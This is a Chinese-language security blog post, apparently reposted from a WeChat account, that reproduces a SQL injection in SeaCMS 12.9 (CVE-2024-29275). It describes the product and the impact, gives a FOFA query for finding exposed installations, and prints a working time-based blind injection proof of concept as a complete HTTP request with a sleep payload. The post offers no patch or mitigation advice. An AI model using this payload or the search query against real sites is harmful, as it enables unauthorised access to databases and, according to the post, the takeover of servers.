海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

admin

107478
文章

90
评论

2024年6月14日17:57:57评论12 views字数 625阅读2分5秒阅读模式

「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

0x02

产品介绍

海洋CMS是一套专为不同需求的站长而设计的内容管理系统，灵活、方便、人性化设计、简单易用是最大的特色，可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发，完全开源免费、无任何加密代码。

0x03

漏洞威胁

海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞，未经授权攻击者可通过该漏洞获取数据库敏感信息，进一步利用可获取服务器权限，导致网站处于极度不安全状态。

影响范围：SeaCMS 12.9

0x04

漏洞环境

FOFA:

app="海洋CMS"

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

0x05

漏洞复现

POC

GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

延时5秒

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

原文始发于微信公众号（冷漠安全）：「漏洞复现」海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

左青龙
微信扫一扫

右白虎
微信扫一扫

海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞(CVE-2024-29275)

Serv-U 目录遍历漏洞(CVE-2024-28995)

世邦通信 SPON IP网络对讲广播系统 my_parser.php 任意文件上传漏洞

某水文系统平台弱口令漏洞复现

Google Analytics开放重定向漏洞

SeaCMS海洋影视管理系统远程代码执行漏洞

电信网关配置管理系统命令执行漏洞

Apache OFBiz 目录遍历导致RCE漏洞(CVE-2024-36104)

CVE-2024-32113 漏洞复现（附POC）

用友NC isAgentLimit 接口 SQL注入漏洞

Fastadmin框架存在任意文件读取漏洞

发表评论

在线咨询

微信